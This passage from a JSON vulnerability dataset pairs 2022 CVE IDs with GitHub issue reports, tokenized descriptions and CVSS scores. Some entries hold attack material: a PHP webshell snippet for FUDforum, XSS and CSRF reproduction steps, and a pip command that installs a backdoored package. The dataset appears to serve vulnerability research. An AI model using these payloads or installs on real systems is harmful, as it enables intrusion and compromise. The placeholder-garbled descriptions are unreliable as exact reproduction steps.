  83455. "description": "Directory Traversal Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG the incoming path value is not filtered, resulting in directory traversal. ERRORTAG POC URLTAG Attack results pictures FILETAG",
  83456. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83457. "severity": "HIGH",
  83458. "baseScore": 7.5,
  83459. "impactScore": 3.6,
  83460. "exploitabilityScore": 3.9
  83461. },
  83462. {
  83463. "CVE_ID": "CVE-2022-30428",
  83464. "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/9",
  83465. "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/9",
  83466. "Repo_new": "gphper/ginadmin",
  83467. "Issue_Created_At": "2022-05-04T11:09:36Z",
  83468. "description": "Read Any File Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG The incoming path value is not filtered, resulting in arbitrary file reading ERRORTAG POC APITAG Attack results pictures FILETAG",
  83469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83470. "severity": "HIGH",
  83471. "baseScore": 7.5,
  83472. "impactScore": 3.6,
  83473. "exploitabilityScore": 3.9
  83474. },
  83475. {
  83476. "CVE_ID": "CVE-2022-30500",
  83477. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/35",
  83478. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/35",
  83479. "Repo_new": "jflyfox/jfinal_cms",
  83480. "Issue_Created_At": "2022-05-07T02:48:35Z",
  83481. "description": "SQLI vul1. There is a SQL injection vulnerability in a backend route of APITAG. The route is shown in FILETAG, the vulnerable argument passing in FILETAG, and the final injection result obtained with sqlmap in FILETAG.",
  83482. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83483. "severity": "CRITICAL",
  83484. "baseScore": 9.8,
  83485. "impactScore": 5.9,
  83486. "exploitabilityScore": 3.9
  83487. },
  83488. {
  83489. "CVE_ID": "CVE-2022-30503",
  83490. "Issue_Url_old": "https://github.com/nginx/njs/issues/478",
  83491. "Issue_Url_new": "https://github.com/nginx/njs/issues/478",
  83492. "Repo_new": "nginx/njs",
  83493. "Issue_Created_At": "2022-03-01T10:21:25Z",
  83494. "description": "SEGV src/njs_value.h in njs_set_number. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG APITAG Ubuntu SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG function APITAG { var arr NUMBERTAG new APITAG var arr NUMBERTAG APITAG = arr NUMBERTAG ar arr_fill = APITAG var func = ERRORTAG ; } APITAG Stack dump APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG e3b NUMBERTAG caa8 (pc NUMBERTAG e3b1e NUMBERTAG bp NUMBERTAG fffe5a NUMBERTAG sp NUMBERTAG fffe5a NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG e3b1e NUMBERTAG in njs_set_number src/njs_value.h NUMBERTAG e3b1e NUMBERTAG in njs_typed_array_set_value APITAG NUMBERTAG e3b0d7ba6 in njs_value_property_set src/njs_value.c NUMBERTAG e3b NUMBERTAG af in njs_value_property_i NUMBERTAG set APITAG NUMBERTAG e3b NUMBERTAG af in njs_array_prototype_fill APITAG NUMBERTAG e3b NUMBERTAG d NUMBERTAG c in njs_function_native_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b NUMBERTAG caba in njs_function_lambda_call APITAG NUMBERTAG e3b0e NUMBERTAG fb in njs_vmcode_interpreter APITAG NUMBERTAG e3b0dd0ba in njs_vm_start APITAG NUMBERTAG e3b0c NUMBERTAG f8 in njs_process_script APITAG NUMBERTAG e3b0c6ebf in njs_process_file APITAG NUMBERTAG e3b0c NUMBERTAG f in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e3b0c3c4d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV src/njs_value.h in njs_set_number NUMBERTAG ABORTING Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83496. "severity": "MEDIUM",
  83497. "baseScore": 5.5,
  83498. "impactScore": 3.6,
  83499. "exploitabilityScore": 1.8
  83500. },
  83501. {
  83502. "CVE_ID": "CVE-2022-30517",
  83503. "Issue_Url_old": "https://github.com/moxi624/mogu_blog_v2/issues/65",
  83504. "Issue_Url_new": "https://github.com/moxi624/mogu_blog_v2/issues/65",
  83505. "Repo_new": "moxi624/mogu_blog_v2",
  83506. "Issue_Created_At": "2022-05-08T11:03:25Z",
  83507. "description": "Mogu blog allows arbitrary file upload via the user avatar feature, which can be abused to host an HTML page carrying an XSS payload. Log in to the Mogu blog using the credentials mogu NUMBERTAG / mogu NUMBERTAG. FILETAG FILETAG FILETAG Choose User Center > User Avatar > Image FILETAG FILETAG. At this point, use Burp Suite to capture the upload request and replay it from the Repeater module in APITAG: change the file contents in the request to the XSS payload and change the file name to an .html suffix. The upload succeeds and the response contains the file path FILETAG. Open the uploaded HTML file in a browser to trigger the payload FILETAG",
  83508. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  83509. "severity": "MEDIUM",
  83510. "baseScore": 6.1,
  83511. "impactScore": 2.7,
  83512. "exploitabilityScore": 2.8
  83513. },
  83514. {
  83515. "CVE_ID": "CVE-2022-30708",
  83516. "Issue_Url_old": "https://github.com/webmin/webmin/issues/1635",
  83517. "Issue_Url_new": "https://github.com/webmin/webmin/issues/1635",
  83518. "Repo_new": "webmin/webmin",
  83519. "Issue_Created_At": "2022-05-14T16:41:01Z",
  83520. "description": "RCE and privilege escalation from a \"safe\" Webmin user. We were RCE hunting on a live stream, sorry for the rough proof of concept. URLTAG URLTAG Please patch.",
  83521. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83522. "severity": "HIGH",
  83523. "baseScore": 8.8,
  83524. "impactScore": 5.9,
  83525. "exploitabilityScore": 2.8
  83526. },
  83527. {
  83528. "CVE_ID": "CVE-2022-30860",
  83529. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/23",
  83530. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/23",
  83531. "Repo_new": "fudforum/fudforum",
  83532. "Issue_Created_At": "2022-05-10T07:54:26Z",
  83533. "description": "Remote code execution bug. Remote code execution via the File Administration System feature in the Admin Control Panel. Affected version: NUMBERTAG. Demo installation: FILETAG. Steps to reproduce: NUMBERTAG go to FILETAG and log in with the admin account (administrator privileges are required, consistent with PR:H in the vector); NUMBERTAG go to the Admin Control Panel and open URLTAG; NUMBERTAG use the file upload feature of the File Administration System to upload a PHP webshell into the webroot directory. APITAG payload: APITAG \"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \" APITAG \"; die NUMBERTAG Access the webshell to obtain remote code execution. Example: URLTAG",
  83534. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83535. "severity": "HIGH",
  83536. "baseScore": 7.2,
  83537. "impactScore": 5.9,
  83538. "exploitabilityScore": 1.2
  83539. },
  83540. {
  83541. "CVE_ID": "CVE-2022-30861",
  83542. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/24",
  83543. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/24",
  83544. "Repo_new": "fudforum/fudforum",
  83545. "Issue_Created_At": "2022-05-10T09:38:47Z",
  83546. "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: FILETAG Reproduce bug: Step NUMBERTAG Login with admin account and go to the Admin Control Panel. Step NUMBERTAG In Categories & Forums, use Forum Manager to add new Forum to Private Forums. Step NUMBERTAG Inject XSS payload to Forum Name field and complete Add Forum XSS payload : a APITAG Step NUMBERTAG Go back to FILETAG > XSS trigger Impact of XSS: If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  83547. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  83548. "severity": "MEDIUM",
  83549. "baseScore": 4.8,
  83550. "impactScore": 2.7,
  83551. "exploitabilityScore": 1.7
  83552. },
  83553. {
  83554. "CVE_ID": "CVE-2022-30877",
  83555. "Issue_Url_old": "https://github.com/OrkoHunter/keep/issues/85",
  83556. "Issue_Url_new": "https://github.com/orkohunter/keep/issues/85",
  83557. "Repo_new": "orkohunter/keep",
  83558. "Issue_Created_At": "2022-05-11T11:13:20Z",
  83559. "description": "Code execution backdoor. Version NUMBERTAG of this project depends on the malicious 'request' package, which contains a code-execution backdoor. Even though PyPI removed the 'request' package, many mirror sites did not delete it, so it can still be installed: running pip3 install keep NUMBERTAG -i URLTAG --trusted-host APITAG successfully installs the malicious 'request' dependency. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG. Note that --trusted-host disables TLS certificate verification for that index, which is itself a supply-chain risk.",
  83560. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83561. "severity": "CRITICAL",
  83562. "baseScore": 9.8,
  83563. "impactScore": 5.9,
  83564. "exploitabilityScore": 3.9
  83565. },
  83566. {
  83567. "CVE_ID": "CVE-2022-30882",
  83568. "Issue_Url_old": "https://github.com/egeback/pyanxdns/issues/1",
  83569. "Issue_Url_new": "https://github.com/egeback/pyanxdns/issues/1",
  83570. "Repo_new": "egeback/pyanxdns",
  83571. "Issue_Created_At": "2022-05-14T02:36:51Z",
  83572. "description": "Code execution backdoor. Version NUMBERTAG of this project depends on the malicious 'request' package, which contains a code-execution backdoor. Even though PyPI removed the 'request' package, many mirror sites did not delete it, so it can still be installed: running pip3 install pyanxdns NUMBERTAG -i URLTAG --trusted-host APITAG successfully installs the malicious 'request' dependency. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG. Note that --trusted-host disables TLS certificate verification for that index, which is itself a supply-chain risk.",
  83573. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83574. "severity": "CRITICAL",
  83575. "baseScore": 9.8,
  83576. "impactScore": 5.9,
  83577. "exploitabilityScore": 3.9
  83578. },
  83579. {
  83580. "CVE_ID": "CVE-2022-30885",
  83581. "Issue_Url_old": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
  83582. "Issue_Url_new": "https://github.com/esdc-esac-esa-int/pyesasky/issues/39",
  83583. "Repo_new": "esdc-esac-esa-int/pyesasky",
  83584. "Issue_Created_At": "2022-05-14T07:41:14Z",
  83585. "description": "Code execution backdoor. Versions NUMBERTAG of this project depend on the malicious 'request' package, which contains a code-execution backdoor. Even though PyPI removed the 'request' package, many mirror sites did not delete it, so it can still be installed: running pip3 install pyesasky NUMBERTAG -i URLTAG --trusted-host APITAG successfully installs the malicious 'request' dependency. FILETAG FILETAG Repair suggestion: delete version NUMBERTAG in APITAG. Note that --trusted-host disables TLS certificate verification for that index, which is itself a supply-chain risk.",
  83586. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83587. "severity": "CRITICAL",
  83588. "baseScore": 9.8,
  83589. "impactScore": 5.9,
  83590. "exploitabilityScore": 3.9
  83591. },
  83592. {
  83593. "CVE_ID": "CVE-2022-30898",
  83594. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/37",
  83595. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/37",
  83596. "Repo_new": "chshcms/cscms",
  83597. "Issue_Created_At": "2022-05-12T08:31:17Z",
  83598. "description": "Cross site request forgery vulnerability exists in Cscms music portal system NUMBERTAG details In cscms NUMBERTAG A problem was found in NUMBERTAG Cross site request forgery (CSRF) vulnerability in PATHTAG allow remote attackers to change Trigger condition: the administrator clicks a malicious link Cause of vulnerability: We can find that this script has no anti CSRF mechanism. Exploit: Login administrator click URL: FILETAG csrf. html\uff1a CODETAG PATHTAG FILETAG administrator Click FILETAG success FILETAG The password has been successfully changed to NUMBERTAG FILETAG Repair method: Join the random token check",
  83599. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  83600. "severity": "MEDIUM",
  83601. "baseScore": 6.5,
  83602. "impactScore": 3.6,
  83603. "exploitabilityScore": 2.8
  83604. },
  83605. {
  83606. "CVE_ID": "CVE-2022-30974",
  83607. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/162",
  83608. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/162",
  83609. "Repo_new": "ccxvii/mujs",
  83610. "Issue_Created_At": "2022-05-15T11:55:53Z",
  83611. "description": "FILETAG Credit FILETAG FILETAG",
  83612. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83613. "severity": "MEDIUM",
  83614. "baseScore": 5.5,
  83615. "impactScore": 3.6,
  83616. "exploitabilityScore": 1.8
  83617. },
  83618. {
  83619. "CVE_ID": "CVE-2022-30975",
  83620. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/161",
  83621. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/161",
  83622. "Repo_new": "ccxvii/mujs",
  83623. "Issue_Created_At": "2022-05-13T14:42:02Z",
  83624. "description": "FILETAG Credit FILETAG FILETAG",
  83625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83626. "severity": "MEDIUM",
  83627. "baseScore": 5.5,
  83628. "impactScore": 3.6,
  83629. "exploitabilityScore": 1.8
  83630. },
  83631. {
  83632. "CVE_ID": "CVE-2022-30976",
  83633. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2179",
  83634. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2179",
  83635. "Repo_new": "gpac/gpac",
  83636. "Issue_Created_At": "2022-04-25T14:26:20Z",
  83637. "description": "FILETAG FILETAG POC FILETAG",
  83638. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  83639. "severity": "HIGH",
  83640. "baseScore": 7.1,
  83641. "impactScore": 5.2,
  83642. "exploitabilityScore": 1.8
  83643. },
  83644. {
  83645. "CVE_ID": "CVE-2022-31015",
  83646. "Issue_Url_old": "https://github.com/Pylons/waitress/issues/374",
  83647. "Issue_Url_new": "https://github.com/pylons/waitress/issues/374",
  83648. "Repo_new": "pylons/waitress",
  83649. "Issue_Created_At": "2022-04-11T16:47:59Z",
  83650. "description": "Possible race condition leading to the main loop dying?. I just might be wrong because if this indeed a race condition it should be breaking more things. Anyway, I got this exception (line numbers might be wrong due to debug statements): ERRORTAG This error was extremely rare but since I was getting it while running tests I could just run a lot of them until one failed, which I did, and I think the problem is a follows NUMBERTAG First, thread APITAG that the app I'm testing is launching, one that runs waitress server, assembles the descriptor lists for select : URLTAG NUMBERTAG Then, thread APITAG deletes one of the channels, in my case it was ERRORTAG , and immediately closes the socket: URLTAG Stack of APITAG at the moment: ERRORTAG NUMBERTAG Then, thread APITAG is trying to see if the file descriptor of the socked closed above is writable, which leads to the the exception above: URLTAG Python NUMBERTAG waitress NUMBERTAG Ubuntu NUMBERTAG LTS focal @ WSL2",
  83651. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83652. "severity": "MEDIUM",
  83653. "baseScore": 5.9,
  83654. "impactScore": 3.6,
  83655. "exploitabilityScore": 2.2
  83656. },
  83657. {
  83658. "CVE_ID": "CVE-2022-31051",
  83659. "Issue_Url_old": "https://github.com/semantic-release/semantic-release/issues/2449",
  83660. "Issue_Url_new": "https://github.com/semantic-release/semantic-release/issues/2449",
  83661. "Repo_new": "semantic-release/semantic-release",
  83662. "Issue_Created_At": "2022-06-03T10:27:20Z",
  83663. "description": "Credentials are revealed in log. Current behavior Credentials are revealed in the logs (see example below): APITAG Expected behavior Credentials should be hidden (see example below); APITAG Environment semantic release version NUMBERTAG CI environment: APITAG Plugins used: commit analyzer, release notes generator, changelog, exec, git semantic release configuration: CODETAG CI logs: see above for the relevant log entry We are using semantic release in combination with Bitbucket Server. Credentials are passed via environment variable BITBUCKET_TOKEN_BASIC_AUTH. AFAIK this should be the relevant line that reveals (logs) the sensitive data: URLTAG",
  83664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83665. "severity": "HIGH",
  83666. "baseScore": 7.5,
  83667. "impactScore": 3.6,
  83668. "exploitabilityScore": 3.9
  83669. },
  83670. {
  83671. "CVE_ID": "CVE-2022-31054",
  83672. "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1946",
  83673. "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1946",
  83674. "Repo_new": "argoproj/argo-events",
  83675. "Issue_Created_At": "2022-05-10T17:48:31Z",
  83676. "description": "8 Uses of deprecated API can be used to cause APITAG in user facing endpoints. APITAG APITAG APITAG Severity | Medium | Difficulty | Medium Target | \u00a0 APITAG APITAG APITAG APITAG Several APITAG APITAG APITAG APITAG APITAG endpoints make use of the deprecated APITAG APITAG APITAG APITAG APITAG . APITAG APITAG APITAG APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. APITAG APITAG APITAG APITAG APITAG Eventsources susceptible to an out of memory denial of service attack: APITAG APITAG APITAG APITAG APITAG APITAG APITAG AWS SNS APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Bitbucket Server APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Gitlab APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Slack APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Storagegrid APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Webhook APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Note that the Stripe Event Source uses APITAG APITAG APITAG APITAG APITAG but limits the size of the request body: APITAG APITAG APITAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG Since APITAG APITAG io/ioutil APITAG APITAG has ceased maintenance we recommend discontinuing all use of this package. APITAG APITAG Severity Medium Difficulty Medium Target Several APITAG endpoints make use of the deprecated APITAG APITAG reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to crash it and cause denial of service. 
Eventsources susceptible to an out of memory denial of service attack: AWS SNS URLTAG Bitbucket URLTAG Bitbucket Server Gitlab URLTAG Slack URLTAG Storagegrid URLTAG Webhook URLTAG Note that the Stripe Event Source uses APITAG but limits the size of the request body: URLTAG Since io/ioutil has ceased maintenance we recommend discontinuing all use of this package.",
  83677. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83678. "severity": "HIGH",
  83679. "baseScore": 7.5,
  83680. "impactScore": 3.6,
  83681. "exploitabilityScore": 3.9
  83682. },
  83683. {
  83684. "CVE_ID": "CVE-2022-31103",
  83685. "Issue_Url_old": "https://github.com/mat-sz/react-letter/issues/17",
  83686. "Issue_Url_new": "https://github.com/mat-sz/react-letter/issues/17",
  83687. "Repo_new": "mat-sz/react-letter",
  83688. "Issue_Created_At": "2022-06-22T03:19:11Z",
  83689. "description": "NUMBERTAG cpu cost and lagging. In production I have issue with this html. If use APITAG there is no error, but if use react letter CPU will hold on NUMBERTAG and the browser will be unresponded Please check FILETAG .",
  83690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83691. "severity": "HIGH",
  83692. "baseScore": 7.5,
  83693. "impactScore": 3.6,
  83694. "exploitabilityScore": 3.9
  83695. },
  83696. {
  83697. "CVE_ID": "CVE-2022-31110",
  83698. "Issue_Url_old": "https://github.com/DIYgod/RSSHub/issues/10045",
  83699. "Issue_Url_new": "https://github.com/diygod/rsshub/issues/10045",
  83700. "Repo_new": "diygod/rsshub",
  83701. "Issue_Created_At": "2022-06-26T18:02:17Z",
  83702. "description": "Vulnerability Report Disclosure: APITAG Catastrophic Backtracking in User supplied Regular Expression. Routes routes NOROUTE Full routes fullroutes NOROUTE Related documentation NOROUTE What is expected? The vulnerability has been fixed (refer to the [security advisory URLTAG . According to the consultation with MENTIONTAG this is a complete disclosure of the vulnerability report, disclosed NUMBERTAG hours after the fix commit. FILETAG \u7b80\u8981\u7684\u7b80\u4f53\u4e2d\u6587\u7ffb\u8bd1\u9644\u5728\u4e0b\u4e00\u6761\u56de\u590d\u3002 Vulnerability Report APITAG Regular expression Denial of Service APITAG Catastrophic Backtracking in User supplied Regular Expression Author: Rongrong APITAG POC APITAG reporting to the repository owner, the vulnerability has been fixed (refer to the security advisory URLTAG . To reproduce the vulnerability, a version before APITAG (inclusive) is needed NUMBERTAG Follow the FILETAG to deploy an APITAG instance in any method (except Vercel or GAE NUMBERTAG APITAG NUMBERTAG The instance is now unresponsive to any request APITAG of Service NUMBERTAG Monitor the CPU usage of the process APITAG . It is now always occupying a whole CPU core. It can last for at least several hours. EXP APITAG is an APITAG instance. APITAG can be nearly any \"route\" of APITAG filter , APITAG , APITAG , APITAG , filterout , APITAG , APITAG , and APITAG are all so called parameters of APITAG which can be supplied in the URI query. These parameters accept user supplied regular expressions with unconditional trust, then call APITAG to perform regular expression matches. All of these parameters are vulnerable. APITAG is the URL encoded form of the regular expression / APITAG /. The POC shows a catastrophic backtracking vulnerable regular expression specially designed for any HTML. 
But most catastrophic backtracking vulnerable regular expression may be able to construct an effective APITAG attack (refer to the APITAG back\" chapter for more details). Once catastrophic backtracking occurs, APITAG can take more than several hours to finish. APITAG is no timeout enforced, causing the APITAG attack to become \"zero cost\": attack once, down for hours. APITAG On multi core servers, the APITAG attack can probably only affect the APITAG instance itself; while APITAG on single core servers, especially VPS NUMBERTAG it can be a disaster. APITAG The component cannot be disabled. APITAG APITAG instance is vulnerable \"out of box\" APITAG unless additional access control is applied. If an external watchdog or timeout is enforced (e.g. Vercel, GAE), the downtime of each effective attack can be limited. However, the instance must be terminated first in order to resume it, so the attack cost is still too low NUMBERTAG Most VPS providers take the advantage of a technology called \"CPU credits\". If a VPS has a high CPU load continuously, it can possibly consume all remaining CPU credits, causing the VPS provider to limit the performance to a fairly low level. Even if the high load ends, it can take at least several hours before there are enough CPU credits to make the performance resume. Vulnerable version Since Git hash APITAG Pull Request NUMBERTAG on APITAG which was merge on Feb NUMBERTAG months ago). APITAG in APITAG Condition to be vulnerable Unless additional access control is applied. If an external watchdog or timeout is enforced, the downtime can be limited but the instance is still vulnerable. Vulnerability grade High. 
Possible fix Either NUMBERTAG Drop the regular expression match feature completely and roll back to string match NUMBERTAG Enforce additional permission check when accepting user supplied regular expressions NUMBERTAG Migrate to a backtracking free regular expression engine NUMBERTAG not really NUMBERTAG a \"fix\") Enforce a timeout when performing a regular expression match NUMBERTAG not really NUMBERTAG a \"fix\") Disable the feature by default and require each instance maintainer to manually enable it NUMBERTAG The attack cost is still too low NUMBERTAG Still vulnerable if manually enabled and matching the \"condition to be vulnerable\". Timeline Considering the fix of the vulnerability is simple, I prefer a NUMBERTAG days timeline (UTC). Jun NUMBERTAG APITAG NUMBERTAG ulnerability found. Vulnerability reported. Jul NUMBERTAG APITAG NUMBERTAG If the email to EMAILTAG gets no response, I will immediately open an issue in the APITAG repository URLTAG , only informing maintainers there is a APITAG vulnerability without disclosing any vulnerability detail. Jun NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG If a fix is committed and pushed to the APITAG repository during this period, I will wait for NUMBERTAG hours in order that maintainers can disclose a security advisory URLTAG on APITAG No matter whether the security advisory has been disclosed or not, once the NUMBERTAG hour deadline is exceeded, I will immediately disclose the full report NUMBERTAG by opening an [issue in the APITAG repository URLTAG . Jul NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG Once a fix is committed and pushed to the APITAG repository during this period, I will immediately disclose the full report by opening an issue in the APITAG repository. Jul NUMBERTAG APITAG NUMBERTAG If no fix was committed and pushed to the APITAG repository during the previous two periods, I will immediately disclose the full report by opening an issue in the APITAG repository. 
Additional conditions Maintainers may ask me to disclose the full report before exceeding the NUMBERTAG hour deadline. Maintainers may consult with me to determine a new timeline, but that consultation must be disclosed along with the full report. If being replied \"won't fix\" or \"not a vulnerability\", I will immediately disclose the full report along with the reply by opening an issue in the APITAG repository. I reserve the right to apply for a CVE ID NUMBERTAG What you are reading. Timeline (in reality) Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability reported. Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability fixed. Replace the regular expression engine to a backtracking free one. Git hash: APITAG Jun NUMBERTAG UTC NUMBERTAG h) The fix was confirmed to be effective. Jun NUMBERTAG UTC NUMBERTAG h) The [security advisory URLTAG was published. Jun NUMBERTAG UTC NUMBERTAG h) Two commits \"for backward compatibility\" opened up the attack surface again by allowing instance maintainers to switch back to the vulnerable regular expression engine. Git hash: APITAG Pull request NUMBERTAG Git hash: APITAG Pull request NUMBERTAG Since they were created by a maintainer APITAG and approved by the repository owner APITAG I choose not to consider it as a vulnerability but document it here for warning (refer to the next chapter). Jun NUMBERTAG UTC NUMBERTAG h) The full report was able to be disclosed. Look back APITAG A APITAG attack is usually severe but cost less, \"defeating the strong with little effort\". APITAG Carelessness and the over trust in the regular expression engine requiring backtracking are the root causes of a APITAG vulnerability, while the common immediate causes are NUMBERTAG A regular expression engine requiring backtracking, and NUMBERTAG A catastrophic backtracking vulnerable regular expression, and NUMBERTAG A user supplied malicious strings. 
APITAG vulnerabilities are not very common since there must be a catastrophic backtracking vulnerable regular expression, which is usually written by programmers and out of the control of end users. APITAG in this vulnerability of APITAG things are different: both the regular expression and the string can be user supplied. APITAG In the POC, I merely showed how to supply a vulnerable regular expression. So how to understand why the string can also be user supplied? A fact is that some \"routes\" (e.g. APITAG ) grab posts from social media, resulting in anyone being able to post malicious strings and request APITAG to grab them. An experienced attacker may merely construct a vulnerable regular expression specially designed for some strings just like the one I have demonstrated. While an inexperienced attacker can easily use known combinations of vulnerable regular expressions and malicious strings. As a result, APITAG everyone who knows what catastrophic backtracking is can probably construct an effective attack APITAG . The fix adopts an alternative regular expression engine ( APITAG ) which is backtracking free. It is quite simple, but effective. It shows a nice example with functionality and security balanced. However, as mentioned, two commits (refer to the previous chapter) have opened up the attack surface again in certain conditions. Those commits re empower instance maintainers to switch back to the vulnerable regular expression engine, the vanilla built in APITAG one ( APITAG ). To be responsible, I warn instance maintainers again not to switch back to APITAG unless: Additional access control URLTAG is applied, or Your instance does not expose to the Internet, or You understand what are you doing exactly and do not care about APITAG attacks. Revisions Re NUMBERTAG Initial report. Re NUMBERTAG Document the chosen fix in the chapter APITAG fix\". Correct some wording and statements. Add two new chapters: APITAG (in reality)\" and APITAG back\". 
Re NUMBERTAG Minor revision. Document two commits opening up the attack surface again in certain conditions. What is actually happening? N/A Deployment information APITAG demo ( FILETAG Deployment information (for self hosted) N/A Additional info APITAG This is not a duplicated issue X] I have searched [existing issues URLTAG to ensure this bug has not already been reported",
  83703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83704. "severity": "HIGH",
  83705. "baseScore": 7.5,
  83706. "impactScore": 3.6,
  83707. "exploitabilityScore": 3.9
  83708. },
  83709. {
  83710. "CVE_ID": "CVE-2022-31259",
  83711. "Issue_Url_old": "https://github.com/beego/beego/issues/4946",
  83712. "Issue_Url_new": "https://github.com/beego/beego/issues/4946",
  83713. "Repo_new": "beego/beego",
  83714. "Issue_Created_At": "2022-05-17T06:42:50Z",
  83715. "description": "router PATHTAG can match PATHTAG URLTAG This modification is still not sufficient\uff0cfor router PATHTAG url like PATHTAG can also be matched FILETAG",
  83716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83717. "severity": "CRITICAL",
  83718. "baseScore": 9.8,
  83719. "impactScore": 5.9,
  83720. "exploitabilityScore": 3.9
  83721. },
  83722. {
  83723. "CVE_ID": "CVE-2022-31267",
  83724. "Issue_Url_old": "https://github.com/gitblit/gitblit/issues/1410",
  83725. "Issue_Url_new": "https://github.com/gitblit-org/gitblit/issues/1410",
  83726. "Repo_new": "gitblit-org/gitblit",
  83727. "Issue_Created_At": "2022-02-28T08:06:52Z",
